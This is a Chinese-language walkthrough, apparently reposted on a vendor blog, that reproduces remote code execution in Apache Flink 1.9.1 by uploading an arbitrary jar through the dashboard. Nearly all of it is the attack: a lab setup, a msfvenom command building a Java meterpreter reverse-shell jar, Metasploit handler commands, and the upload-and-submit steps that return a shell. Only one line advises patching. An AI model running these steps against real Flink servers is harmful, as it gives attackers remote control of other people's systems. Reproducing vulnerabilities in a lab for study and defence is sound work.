您好,登錄后才能下訂單哦!
這篇文章給大家分享的是有關(guān)Apache Flink任意Jar包上傳致RCE漏洞的示例分析的內(nèi)容。小編覺得挺實(shí)用的,因此分享給大家做個(gè)參考,一起跟隨小編過來看看吧。
攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達(dá)到遠(yuǎn)程代碼執(zhí)行的目的
到目前Apache Flink 1.9.1版本
攻擊機(jī):kali
受害機(jī):ubuntu16
1. 安裝java8環(huán)境,自行百度教程
2. 下載Flink1.9.1版本,然后解壓安裝包
Flink下載地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
解壓 tar -zxvf
3. 進(jìn)入bin目錄運(yùn)行./start-cluster.sh啟動(dòng)環(huán)境
4.在瀏覽器打開,出現(xiàn)以下界面表示安裝成功
1. 首先使用kali生成jar的后門包
msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar
2.使用msfconsole監(jiān)聽shell設(shè)置的端口
use exploit/multi/handler
set payload java/shell/reverse_tcp
3.run開啟監(jiān)聽
4.把制作好的shell.jar包訪問目標(biāo)站點(diǎn)并上傳shell.jar
5.點(diǎn)擊Submit觸發(fā)漏洞,反彈回了shell
更新官方補(bǔ)丁或更新最新版本
感謝各位的閱讀!關(guān)于“Apache Flink任意Jar包上傳致RCE漏洞的示例分析”這篇文章就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,讓大家可以學(xué)到更多知識(shí),如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到吧!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。